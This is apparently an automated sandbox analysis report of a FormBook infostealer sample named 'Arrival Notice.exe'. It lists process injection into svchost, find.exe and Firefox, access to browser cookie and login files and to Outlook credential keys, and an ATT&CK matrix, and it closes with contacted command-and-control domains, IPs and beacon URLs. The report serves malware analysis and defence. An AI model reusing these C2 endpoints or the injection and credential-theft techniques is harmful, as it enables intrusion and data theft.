Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtCreateFile: Direct from: 0x77762FEC	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtOpenFile: Direct from: 0x77762DCC	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtOpenKeyEx: Direct from: 0x77762B9C	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtSetInformationProcess: Direct from: 0x77762C5C	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	NtProtectVirtualMemory: Direct from: 0x77762F9C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Arrival Notice.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\find.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: NULL target: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: NULL target: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\find.exe

Thread register set: target process: 2384

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\find.exe

Thread APC queued: target process: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Arrival Notice.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2C18008

Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice.exe

Code function: 0_2_00436CD7 LogonUserW,

0_2_00436CD7

Source: C:\Users\user\Desktop\Arrival Notice.exe

0_2_0040D590

Source: C:\Users\user\Desktop\Arrival Notice.exe

Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00434418

Source: C:\Users\user\Desktop\Arrival Notice.exe

Code function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,

0_2_0043333C

Source: C:\Users\user\Desktop\Arrival Notice.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Arrival Notice.exe"	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe	Process created: C:\Windows\SysWOW64\find.exe "C:\Windows\SysWOW64\find.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice.exe

Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00446124

Source: Arrival Notice.exe, fXkDwRWxFFQGfp.exe, 00000009.00000002.3754064477.0000000001630000.00000002.00000001.00040000.00000000.sdmp, fXkDwRWxFFQGfp.exe, 00000009.00000000.1415126918.0000000001630000.00000002.00000001.00040000.00000000.sdmp, fXkDwRWxFFQGfp.exe, 0000000C.00000000.1573056374.00000000016B1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: fXkDwRWxFFQGfp.exe, 00000009.00000002.3754064477.0000000001630000.00000002.00000001.00040000.00000000.sdmp, fXkDwRWxFFQGfp.exe, 00000009.00000000.1415126918.0000000001630000.00000002.00000001.00040000.00000000.sdmp, fXkDwRWxFFQGfp.exe, 0000000C.00000000.1573056374.00000000016B1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: fXkDwRWxFFQGfp.exe, 00000009.00000002.3754064477.0000000001630000.00000002.00000001.00040000.00000000.sdmp, fXkDwRWxFFQGfp.exe, 00000009.00000000.1415126918.0000000001630000.00000002.00000001.00040000.00000000.sdmp, fXkDwRWxFFQGfp.exe, 0000000C.00000000.1573056374.00000000016B1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: fXkDwRWxFFQGfp.exe, 00000009.00000002.3754064477.0000000001630000.00000002.00000001.00040000.00000000.sdmp, fXkDwRWxFFQGfp.exe, 00000009.00000000.1415126918.0000000001630000.00000002.00000001.00040000.00000000.sdmp, fXkDwRWxFFQGfp.exe, 0000000C.00000000.1573056374.00000000016B1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: Arrival Notice.exe	Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning

Source: C:\Users\user\Desktop\Arrival Notice.exe

Code function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,

0_2_004720DB

Source: C:\Users\user\Desktop\Arrival Notice.exe

Code function: 0_2_00472C3F GetUserNameW,

0_2_00472C3F

Source: C:\Users\user\Desktop\Arrival Notice.exe

Code function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

0_2_0041E364

Source: C:\Users\user\Desktop\Arrival Notice.exe

Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,

0_2_0040E500

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3746964118.0000000002540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1492845743.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3754741570.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3757179262.00000000054F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1493958694.0000000003530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3754536701.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1494766146.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3754584552.0000000002C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\find.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\find.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: Arrival Notice.exe	Binary or memory string: WIN_XP
Source: Arrival Notice.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
Source: Arrival Notice.exe	Binary or memory string: WIN_XPe
Source: Arrival Notice.exe	Binary or memory string: WIN_VISTA
Source: Arrival Notice.exe	Binary or memory string: WIN_7
Source: Arrival Notice.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3746964118.0000000002540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1492845743.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3754741570.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3757179262.00000000054F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1493958694.0000000003530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3754536701.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1494766146.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3754584552.0000000002C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	0_2_004652BE
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00476619
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,	0_2_0046CEF3

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	16 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	141 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Arrival Notice.exe	34%	ReversingLabs
Arrival Notice.exe	42%	Virustotal		Browse
Arrival Notice.exe	100%	Avira	HEUR/AGEN.1321703
Arrival Notice.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.b2iqd.top/g8fb/	0%	Avira URL Cloud	safe
http://www.solarand.online/1jhj/?m2gpQ=YfW+isNxg3o3M+3b8iUoLSe7bztYi80mfWBugJ2MJlsi+oKL/t+PoAeEH7mT5YnCbxa2fokj9utgMIVvF1qc1kyP51+K5wadj8Hc7obOiRyGIBJp8NxnCEZeYebMQAIMmW1V2iVRSYza&KjH=KRIxdVHP60TD8	0%	Avira URL Cloud	safe
http://www.megaweb8.top/9tmz/	100%	Avira URL Cloud	malware
http://www.b2iqd.top/g8fb/?m2gpQ=YIk8BARVWSn/QuGUQnkYsazoDYcX4x9RQfS4QBmHenTb8HDBBCrEcM3ZVamem1jnr3BtnBAXBF5diw+d30GcsvfF4YEeTq91lSuPwlPrCtk82kMLzGGbulJdlPGFAXTDhsCQnbqSco+x&KjH=KRIxdVHP60TD8	0%	Avira URL Cloud	safe
http://www.basicreviews.online/cgi-sys/suspendedpage.cgi?KjH=KRIxdVHP60TD8&m2gpQ=Dzm3lrGSWWKZ8d6JM	0%	Avira URL Cloud	safe
http://www.dccf.earth/tqc2/	0%	Avira URL Cloud	safe
http://www.030003452.xyz/7nfi/	0%	Avira URL Cloud	safe
http://www.wethebeststore.online/znb6/	0%	Avira URL Cloud	safe
http://www.megaweb8.top/9tmz/?KjH=KRIxdVHP60TD8&m2gpQ=NV1tTcsqNp6kYU/NXIxVbRYgayRVnArU9EiSb08h70XbT7GakAVreBKCJMPRzvHbWdCzhb2rvOXrdRlLN/AVokaQeP6tHquK0CCjiZSviNcmDdeyv9j5LfcBhXqGhSsmGfBUz+LOACLV	100%	Avira URL Cloud	malware
http://www.rtpakuratkribo.xyz/7m52/	0%	Avira URL Cloud	safe
http://www.pluribiz.life/khsn/?m2gpQ=TXD/9ddHP74eJYFExo0CjTUKkcm39u6VsxdqO5O9CqX8y9tdKNpr+RH/ydKFsRdYIeJS6PQWxoGMZT8zvmt3ATvVqoxwavOvPc4jEyVJChxhY6BZ1VVxdG/duJ25EixLuzB68GCTq/xk&KjH=KRIxdVHP60TD8	0%	Avira URL Cloud	safe
http://www.jigg.space/ezhm?gp=1&js=1&uuid=1731394600.0005327985&other_args=eyJ1cmkiOiAiL2V6aG0iLCAiY	0%	Avira URL Cloud	safe
http://www.ipk.app/phav/?m2gpQ=AsRIlW4lFKT9Nge6nW8q5kZJ9+aApraoCL+7EeDUtaFqAdK5eeKmvpb7/el6gzXbva7HD1PGy27Em9no4zvTQ2Xe2FD0eGM44XV8TC1BDup3KiSR4IJPoQsxoY4gT4/b1NYL9SIl9eH2&KjH=KRIxdVHP60TD8	0%	Avira URL Cloud	safe
http://www.basicreviews.online/cop9/?KjH=KRIxdVHP60TD8&m2gpQ=Dzm3lrGSWWKZ8d6JM+prrPLynhO90ZRuHyYf7unPNgg/3SGnvxfS4q3U7MLR/+yk1Q2rwqljseJsL4/cnipgQGBqHPAYb0JP0ikc1qr6EU87NkgIVx/qiQJVlVgkqy/u0Urju/xz+Ouj	0%	Avira URL Cloud	safe
http://www.pluribiz.life/khsn/	0%	Avira URL Cloud	safe
http://www.basicreviews.online	0%	Avira URL Cloud	safe
http://www.wethebeststore.online/znb6/?m2gpQ=4z8JxI0nRVLXBlRrydZdwmqPRLgcHgod4ZZEwprDCqeuR1X4EJPq9hqUp4XV2iNrlK1zceLjjdxAFB8hiM3pNAL8f7bcCQHaun+lOMiDBkB7id3F4mO5dhanL54VXfzZsnkFdU/HHMoW&KjH=KRIxdVHP60TD8	0%	Avira URL Cloud	safe
http://www.solarand.online/1jhj/	0%	Avira URL Cloud	safe
http://www.idaschem.xyz/k45l/?KjH=KRIxdVHP60TD8&m2gpQ=eEsmO3tqxgZhecFuD1iDKSUxkj6BCtqtHYZ6OUA3SqEwtG4TBmhjXYADabhkz5bgV/61+lmRmR6oEEDWXEosNoiXdOP4Lj5MSzeooDlhyxnqAyQltERXmLQw2Ss2SnlAtV+TG/a37xhv	0%	Avira URL Cloud	safe
http://www.vnxoso88.art/sciu/	100%	Avira URL Cloud	malware
http://www.idaschem.xyz/k45l/	0%	Avira URL Cloud	safe
http://www.vnxoso88.art/sciu/?m2gpQ=YIkuFVuW2E28e4WkTeJVCzzknQiQ0fQ5lFYo7Kt/9G+eExaeK9iNv/1DyEL0uQ9QqookS/lhd7RPtmaZyJokLYniVjhicuG4fHS3nSlILxZzvAKFwxHmhkRjxK9ClG7JmJxrzRt3MvPo&KjH=KRIxdVHP60TD8	100%	Avira URL Cloud	malware
http://www70.jigg.space/	0%	Avira URL Cloud	safe
http://www.jigg.space/ezhm/?m2gpQ=dQjGhxXMHv5+YwjryQcJrySkOGIlRyTTAmxJxQLZURFTEZTj1YJRXXyzUfzSUuBT8AWS6f5Uz3vbXV/G8YOf4Jqhl0le5SLuNKA+C9qBgvFZXkaOdih32u0uCf5d5IJ7EKd73Mp04V7U&KjH=KRIxdVHP60TD8	0%	Avira URL Cloud	safe
http://www.jigg.space/ezhm/	0%	Avira URL Cloud	safe
http://www.39978.club/4bhh/?m2gpQ=qVEhfIHZC/LrType2rBHfLPSl0/OSjD2TKGEGSewNOQTw+ALrB9paARDDp1DVoSDqn+95aH9GG7zoH9yEvfJnuv1rwGVZHrlJTCOHoay8LjwAA5ZI3MNl68qZc1+kbfm1rx6EKcKPurO&KjH=KRIxdVHP60TD8	0%	Avira URL Cloud	safe
http://www.gamebaitopzo.fun/igdb/	0%	Avira URL Cloud	safe
http://www.rtpakuratkribo.xyz/7m52/?m2gpQ=KUfzNxzC0/tkF/Sfag5rxehoMO8NdG75VoGUrTTYHgYMfDszE7nAAPd4WyzgZAEusu3dyfDqSmUHPfAxKZywGgYzE1+gbAbmefiRMJeaIMpM+K6CCyvQgZeaisFx9/9ei8/+pPx29LDH&KjH=KRIxdVHP60TD8	0%	Avira URL Cloud	safe
http://www.030003452.xyz/7nfi/?m2gpQ=Hc05NKMVGljRJ208GoJiuvJwS+qtlqhBfxwxnuqPPp/t3suBlIaw+qLklfi1FFvtvcqP4hR32up8rQp3nsg47f9wbTR1iuyCcnVpZrM4KA8DS5fnn6F+xl7ZQWTXNpehtq7GmXwpqKtZ&KjH=KRIxdVHP60TD8	0%	Avira URL Cloud	safe
http://www.ipk.app/phav/	0%	Avira URL Cloud	safe
http://www.basicreviews.online/cop9/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.megaweb8.top	172.67.221.220	true	true	unknown
www.jigg.space	96.126.123.244	true	true	unknown
www.pluribiz.life	209.74.64.58	true	true	unknown
solarand.online	217.160.0.60	true	true	unknown
www.030003452.xyz	161.97.142.144	true	true	unknown
dccf.earth	3.33.130.190	true	true	unknown
natroredirect.natrocdn.com	85.159.66.93	true	false	high
basicreviews.online	144.76.190.39	true	true	unknown
rtpakuratkribo.xyz	66.29.146.173	true	true	unknown
77980.bodis.com	199.59.243.227	true	false	high
www.b2iqd.top	20.2.208.137	true	true	unknown
www.gamebaitopzo.fun	104.21.69.93	true	true	unknown
gtml.huksa.huhusddfnsuegcdn.com	206.119.185.141	true	false	high
www.ipk.app	13.248.169.48	true	true	unknown
wethebeststore.online	91.184.0.200	true	true	unknown
www.solarand.online	unknown	unknown	false	unknown
www.dccf.earth	unknown	unknown	false	unknown
www.wethebeststore.online	unknown	unknown	false	unknown
www.39978.club	unknown	unknown	false	unknown
www.vnxoso88.art	unknown	unknown	false	unknown
www.rtpakuratkribo.xyz	unknown	unknown	true	unknown
www.idaschem.xyz	unknown	unknown	true	unknown
www.basicreviews.online	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.dccf.earth/tqc2/	true	Avira URL Cloud: safe	unknown
http://www.b2iqd.top/g8fb/	true	Avira URL Cloud: safe	unknown
http://www.megaweb8.top/9tmz/?KjH=KRIxdVHP60TD8&m2gpQ=NV1tTcsqNp6kYU/NXIxVbRYgayRVnArU9EiSb08h70XbT7GakAVreBKCJMPRzvHbWdCzhb2rvOXrdRlLN/AVokaQeP6tHquK0CCjiZSviNcmDdeyv9j5LfcBhXqGhSsmGfBUz+LOACLV	true	Avira URL Cloud: malware	unknown
http://www.b2iqd.top/g8fb/?m2gpQ=YIk8BARVWSn/QuGUQnkYsazoDYcX4x9RQfS4QBmHenTb8HDBBCrEcM3ZVamem1jnr3BtnBAXBF5diw+d30GcsvfF4YEeTq91lSuPwlPrCtk82kMLzGGbulJdlPGFAXTDhsCQnbqSco+x&KjH=KRIxdVHP60TD8	true	Avira URL Cloud: safe	unknown
http://www.megaweb8.top/9tmz/	true	Avira URL Cloud: malware	unknown
http://www.rtpakuratkribo.xyz/7m52/	true	Avira URL Cloud: safe	unknown
http://www.solarand.online/1jhj/?m2gpQ=YfW+isNxg3o3M+3b8iUoLSe7bztYi80mfWBugJ2MJlsi+oKL/t+PoAeEH7mT5YnCbxa2fokj9utgMIVvF1qc1kyP51+K5wadj8Hc7obOiRyGIBJp8NxnCEZeYebMQAIMmW1V2iVRSYza&KjH=KRIxdVHP60TD8	true	Avira URL Cloud: safe	unknown
http://www.030003452.xyz/7nfi/	true	Avira URL Cloud: safe	unknown
http://www.wethebeststore.online/znb6/	true	Avira URL Cloud: safe	unknown
http://www.solarand.online/1jhj/	true	Avira URL Cloud: safe	unknown
http://www.ipk.app/phav/?m2gpQ=AsRIlW4lFKT9Nge6nW8q5kZJ9+aApraoCL+7EeDUtaFqAdK5eeKmvpb7/el6gzXbva7HD1PGy27Em9no4zvTQ2Xe2FD0eGM44XV8TC1BDup3KiSR4IJPoQsxoY4gT4/b1NYL9SIl9eH2&KjH=KRIxdVHP60TD8	true	Avira URL Cloud: safe	unknown
http://www.vnxoso88.art/sciu/	true	Avira URL Cloud: malware	unknown
http://www.pluribiz.life/khsn/?m2gpQ=TXD/9ddHP74eJYFExo0CjTUKkcm39u6VsxdqO5O9CqX8y9tdKNpr+RH/ydKFsRdYIeJS6PQWxoGMZT8zvmt3ATvVqoxwavOvPc4jEyVJChxhY6BZ1VVxdG/duJ25EixLuzB68GCTq/xk&KjH=KRIxdVHP60TD8	true	Avira URL Cloud: safe	unknown
http://www.idaschem.xyz/k45l/?KjH=KRIxdVHP60TD8&m2gpQ=eEsmO3tqxgZhecFuD1iDKSUxkj6BCtqtHYZ6OUA3SqEwtG4TBmhjXYADabhkz5bgV/61+lmRmR6oEEDWXEosNoiXdOP4Lj5MSzeooDlhyxnqAyQltERXmLQw2Ss2SnlAtV+TG/a37xhv	true	Avira URL Cloud: safe	unknown
http://www.basicreviews.online/cop9/?KjH=KRIxdVHP60TD8&m2gpQ=Dzm3lrGSWWKZ8d6JM+prrPLynhO90ZRuHyYf7unPNgg/3SGnvxfS4q3U7MLR/+yk1Q2rwqljseJsL4/cnipgQGBqHPAYb0JP0ikc1qr6EU87NkgIVx/qiQJVlVgkqy/u0Urju/xz+Ouj	true	Avira URL Cloud: safe	unknown
http://www.pluribiz.life/khsn/	true	Avira URL Cloud: safe	unknown
